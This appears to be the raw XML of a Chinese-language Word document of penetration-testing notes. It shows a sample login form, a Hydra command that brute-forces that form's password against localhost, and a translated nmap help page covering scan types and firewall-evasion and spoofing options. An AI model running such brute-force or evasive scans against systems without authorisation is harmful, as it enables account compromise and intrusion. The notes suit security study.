          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="text"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="name"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/&gt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BR</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="password"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="pwd"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/&gt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="submit"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="sub"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="提交"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">　　hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&amp;pwd</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=^PASS^:&lt;title&gt;Error Password&lt;/title&gt;”</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
        <w:t xml:space="preserve"> 　 注释：&lt;title&gt;随意定制，错误信息返回&lt;/title&gt;　　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="00314E55" w:rsidRDefault="00314E55" w:rsidP="00314E55"/>
    <w:p w:rsidR="00D039E7" w:rsidRDefault="00D039E7" w:rsidP="00704B46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_0Day漏洞"/>
      <w:bookmarkStart w:id="56" w:name="_Toc489789730"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0Day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00704B46" w:rsidRDefault="00ED7FAF" w:rsidP="00704B46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc489789731"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Nmap)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/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用法：nmap [扫描类型] [选项] {目标规格}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目标规格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可以通过主机名，IP地址，网络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例如：scanme.nmap.org，microsoft.com/24，192.168.0.1; 10.0.0-255.1-254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iL &lt;inputfilename&gt;：从主机/网络列表输入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iR &lt;num hosts&gt;：选择随机目标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exclude &lt;host1 [，host2] [，host3]，...&gt;：排除主机/网络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excludefile &lt;exclude_file&gt;：从文件中排除列表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主机发现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L：列表扫描 - 只需列出要扫描的目标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n：Ping扫描 - 禁用端口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-Pn：将所有主机视为在线 - 跳过主机发现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PS / PA / PU / PY [portlist]：向给定端口发送TCP SYN / ACK，UDP或SCTP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PE / PP / PM：ICMP回显，时间戳和网络掩码请求发现探测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PO [协议列表]：IP协议Ping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n / -R：不要做DNS解析/总是解决[默认：有时]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dns-servers &lt;serv1 [，serv2]，...&gt;：指定自定义DNS服务器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ystem-dns：使用操作系统的DNS解析器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traceroute：跟踪每个主机的跳转路径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扫描技术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S / sT / sA / sW / sM：TCP SYN / Connect（）/ ACK / Window / Maimon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U：UDP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N / sF / sX：TCP Null，FIN和Xmas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canflags &lt;flags&gt;：自定义TCP扫描标志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I &lt;zombie host [：probeport]&gt;：空闲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Y / sZ：SCTP INIT / COOKIE-ECHO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O：IP协议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b &lt;FTP中继主机&gt;：FTP反弹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端口规格和扫描订单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p &lt;端口范围&gt;：仅扫描指定的端口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  例如：-p22; -p1-65535; -p U：53,111,137，T：21-25,80,139,8080，S：9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exclude-ports &lt;port ranges&gt;：从扫描中排除指定的端口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F：快速模式 - 扫描比默认扫描少的端口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r：连续扫描端口 - 不要随机化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top-ports &lt;number&gt;：扫描&lt;number&gt;最常用的端口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port-ratio &lt;ratio&gt;：扫描端口比&lt;ratio&gt;更常见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服务/版本检测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V：探测打开端口以确定服务/版本信息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version-intensity &lt;level&gt;：从0（亮）到9（尝试所有探针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 变换光：极限探测器（强度2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version-all：尝试每一个探针（强度9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version-trace：显示详细的版本扫描活动（用于调试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脚本扫描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C：相当于--script = default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cript = &lt;Lua scripts&gt;：&lt;Lua scripts&gt;是一个逗号分隔的列表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         目录，脚本文件或脚本类别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cript-args = &lt;n1 = v1，[n2 = v2，...]&gt;：为脚本提供参数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cript-args-file = filename：在文件中提供NSE脚本参数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cript-trace：显示发送和接收的所有数据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cript-updatedb：更新脚本数据库。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cript-help = &lt;Lua脚本&gt;：显示有关脚本的帮助。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         &lt;Lua scripts&gt;是逗号分隔的脚本文件列表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脚本的类别。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操作系统检测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O：启用操作系统检测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osscan-limit：将操作系统检测限制为有希望的目标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 可以猜测：猜测操作系统更积极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时间和性能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采取&lt;time&gt;的选项以秒为单位，或追加“ms”（毫秒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'（秒），'m'（分钟）或'h'（小时）到该值（例如30m）。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T &lt;0-5&gt;：设置时间模板（越高越好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min-hostgroup / max-hostgroup &lt;size&gt;：并行主机扫描组大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min-parallelism / max-parallelism &lt;numprobes&gt;：探针并行化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min-rtt-timeout / max-rtt-timeout / initial-rtt-timeout &lt;time&gt;：指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    探测往返时间。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max-retries &lt;attempts&gt;：端口扫描探测重传的Caps number。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host-timeout &lt;time&gt;：在此之后放弃目标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can-delay /  -  max-scan-delay &lt;time&gt;：调整探测器之间的延迟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min-rate &lt;number&gt;：发送速度慢于&lt;number&gt;每秒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max-rate &lt;number&gt;：发送数据包速度不超过每秒的&lt;number&gt;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防火墙/ IDS逃避和SPOOFING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F; --mtu &lt;val&gt;：片段数据包（可选地，给定MTU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D &lt;decoy1，decoy2 [，ME]，...&gt;：用诱惑遮掩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S &lt;IP_Address&gt;：欺骗源地址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e &lt;iface&gt;：使用指定的接口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g /  -  source-port &lt;portnum&gt;：使用给定的端口号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proxies &lt;url1，[url2]，...&gt;：通过HTTP / SOCKS4代理的中继连接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data &lt;hex string&gt;：向发送的数据包附加自定义的有效负载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data-string &lt;string&gt;：将自定义ASCII字符串附加到发送的数据包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data-length &lt;num&gt;：将随机数据附加到发送的数据包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ip-options &lt;options&gt;：使用指定的ip选项发送数据包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ttl &lt;val&gt;：设置IP生存时间字段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poof-mac &lt;mac address / prefix / vendor name&gt;：欺骗您的MAC地址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badsum：发送具有假TCP / UDP / SCTP校验和的数据包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OUTPUT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oN / -oX / -oS / -oG &lt;file&gt;：正常输出扫描，XML，s | &lt;rIpt kIddi3，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   和Grepable格式，分别给给定的文件名。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oA &lt;basename&gt;：一次输出三种主要格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v：增加详细程度（使用-vv或更多的效果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d：增加调试级别（使用-dd或更多更大的效果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reason：显示端口处于特定状态的原因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open：仅显示打开（或可能打开）的端口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packet-trace：显示发送和接收的所有数据包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iflist：打印主机接口和路由（用于调试）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append-output：追加而不是clobber指定的输出文件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--resume &lt;filename&gt;：恢复中止的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tylesheet &lt;path / URL&gt;：将XML输出转换为HTML的XSL样式表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</w:t>
      </w:r>
      <w:r w:rsidR="006D575E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>xml：来自Nmap.Org的引用样式表，用于更多的便携式XML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no-stylesheet：防止XSL样式表与XML输出关联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MISC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6：启用IPv6扫描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A：启用操作系统检测，版本检测，脚本扫描和跟踪路由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datadir &lt;dirname&gt;：指定自定义Nmap数据文件位置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send-eth /  -  send-ip：使用原始以太网帧或IP数据包发送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privileged：假设用户是完全特权的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-unprivileged：假设用户缺少原始套接字权限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V：打印版本号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-h：打印此帮助摘要页面。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>例子：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nmap -v -A scanme.nmap.org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nmap -v -sn 192.168.0.0/16 10.0.0.0/8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097207B" w:rsidRDefault="0097207B" w:rsidP="0097207B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  nmap -v -iR 10000 -Pn -p80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097207B" w:rsidRPr="0097207B" w:rsidRDefault="0097207B" w:rsidP="0097207B"/>
    <w:p w:rsidR="00783259" w:rsidRPr="00783259" w:rsidRDefault="00783259" w:rsidP="00783259"/>
    <w:p w:rsidR="002F02A3" w:rsidRPr="002F02A3" w:rsidRDefault="002F02A3" w:rsidP="002F02A3"/>
    <w:sectPr w:rsidR="002F02A3" w:rsidRPr="002F0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89F" w:rsidRDefault="0073089F" w:rsidP="00667513">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0073089F" w:rsidRDefault="0073089F" w:rsidP="0066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hell Dlg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89F" w:rsidRDefault="0073089F" w:rsidP="00667513">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0073089F" w:rsidRDefault="0073089F" w:rsidP="0066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87E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F8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1C06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2A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914FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1C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27A65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EA8BF06"/>
    <w:lvl w:ilvl="0" w:tplc="C5E6BDC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading6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73AC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D900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6D39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD0003D2"/>
    <w:lvl w:ilvl="0" w:tplc="8CF4D8B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Heading4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E2128"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50F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40FC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D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A47E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="338CD8A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F66EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C02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467AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F3C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07022"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="227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1072E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="220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54D5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="745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4217F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56CC6496"/>
    <w:lvl w:ilvl="0" w:tplc="047E904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D7472"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33CA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1628F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B58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81ECA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE50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D5EDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="679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E3E70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AA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B2D21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25F4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C237C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DD2547A"/>
    <w:lvl w:ilvl="0" w:tplc="2B5A5EF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Heading3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843438"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8EA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A33EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5228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F48B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="835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16A9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FE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D3519"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="721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413EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAA6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5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4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17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="19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6D"/>
    <w:rsid w:val="00004EF8"/>
    <w:rsid w:val="00004FA5"/>
    <w:rsid w:val="0000682A"/>
    <w:rsid w:val="00006CD2"/>
    <w:rsid w:val="00013D12"/>
    <w:rsid w:val="00020C91"/>
    <w:rsid w:val="00026F3E"/>
    <w:rsid w:val="00031287"/>
    <w:rsid w:val="00043000"/>
    <w:rsid w:val="00044F68"/>
    <w:rsid w:val="00054F89"/>
    <w:rsid w:val="00056489"/>
    <w:rsid w:val="0006117E"/>
    <w:rsid w:val="0007740F"/>
    <w:rsid w:val="000813BA"/>
    <w:rsid w:val="0008381B"/>
    <w:rsid w:val="000850E6"/>
    <w:rsid w:val="000916EF"/>
    <w:rsid w:val="00093352"/>
    <w:rsid w:val="000A30BD"/>
    <w:rsid w:val="000A35DF"/>
    <w:rsid w:val="000C5E7B"/>
    <w:rsid w:val="000D2176"/>
    <w:rsid w:val="000E1DE1"/>
    <w:rsid w:val="000E2133"/>
    <w:rsid w:val="000E4713"/>
    <w:rsid w:val="000F7C75"/>
    <w:rsid w:val="00104D3A"/>
    <w:rsid w:val="001053E3"/>
    <w:rsid w:val="001059D0"/>
    <w:rsid w:val="001144A3"/>
    <w:rsid w:val="0011769A"/>
    <w:rsid w:val="001207C4"/>
    <w:rsid w:val="00120D94"/>
    <w:rsid w:val="00122CB1"/>
    <w:rsid w:val="001230D6"/>
    <w:rsid w:val="00124432"/>
    <w:rsid w:val="00127FAD"/>
    <w:rsid w:val="001315FC"/>
    <w:rsid w:val="00134D3D"/>
    <w:rsid w:val="00135C20"/>
    <w:rsid w:val="001543DD"/>
    <w:rsid w:val="001554B2"/>
    <w:rsid w:val="00180DC4"/>
    <w:rsid w:val="00184A44"/>
    <w:rsid w:val="001863B7"/>
    <w:rsid w:val="00195C12"/>
    <w:rsid w:val="001A6AA7"/>
    <w:rsid w:val="001B1C0A"/>
    <w:rsid w:val="001B1F66"/>
    <w:rsid w:val="001B31C5"/>
    <w:rsid w:val="001D07C6"/>
    <w:rsid w:val="001E4E23"/>
    <w:rsid w:val="001F20E4"/>
    <w:rsid w:val="001F3F2D"/>
    <w:rsid w:val="002024B7"/>
    <w:rsid w:val="00203F82"/>
    <w:rsid w:val="00215F30"/>
    <w:rsid w:val="00231AA7"/>
    <w:rsid w:val="002358DF"/>
    <w:rsid w:val="00236B87"/>
    <w:rsid w:val="002456AC"/>
    <w:rsid w:val="002470C2"/>
    <w:rsid w:val="00252646"/>
    <w:rsid w:val="00254628"/>
    <w:rsid w:val="002616C0"/>
    <w:rsid w:val="0026306B"/>
    <w:rsid w:val="00271A77"/>
    <w:rsid w:val="0027495C"/>
    <w:rsid w:val="002749EA"/>
    <w:rsid w:val="002773BB"/>
    <w:rsid w:val="00292A7C"/>
    <w:rsid w:val="00294117"/>
    <w:rsid w:val="002948B6"/>
    <w:rsid w:val="00296FA9"/>
    <w:rsid w:val="002A3F4F"/>
    <w:rsid w:val="002B276B"/>
    <w:rsid w:val="002B4DEE"/>
    <w:rsid w:val="002B6ED2"/>
    <w:rsid w:val="002C6328"/>
    <w:rsid w:val="002D3999"/>
    <w:rsid w:val="002F02A3"/>
    <w:rsid w:val="002F490D"/>
    <w:rsid w:val="00306303"/>
    <w:rsid w:val="00310700"/>
    <w:rsid w:val="00314E55"/>
    <w:rsid w:val="00317ACD"/>
    <w:rsid w:val="0032252D"/>
    <w:rsid w:val="003233AA"/>
    <w:rsid w:val="0032360F"/>
    <w:rsid w:val="003249B7"/>
    <w:rsid w:val="003362CC"/>
    <w:rsid w:val="003417F2"/>
    <w:rsid w:val="00343292"/>
    <w:rsid w:val="0035728E"/>
    <w:rsid w:val="00365AB5"/>
    <w:rsid w:val="00366F87"/>
    <w:rsid w:val="00376506"/>
    <w:rsid w:val="00382390"/>
    <w:rsid w:val="00382EF9"/>
    <w:rsid w:val="00383303"/>
    <w:rsid w:val="00384A4D"/>
    <w:rsid w:val="00391070"/>
    <w:rsid w:val="00391762"/>
    <w:rsid w:val="00391B9E"/>
    <w:rsid w:val="003A7886"/>
    <w:rsid w:val="003B2733"/>
    <w:rsid w:val="003B3A99"/>
    <w:rsid w:val="003B51CA"/>
    <w:rsid w:val="003D24B9"/>
    <w:rsid w:val="003D4A77"/>
    <w:rsid w:val="003E39F0"/>
    <w:rsid w:val="00403CFF"/>
    <w:rsid w:val="00404167"/>
    <w:rsid w:val="004044CD"/>
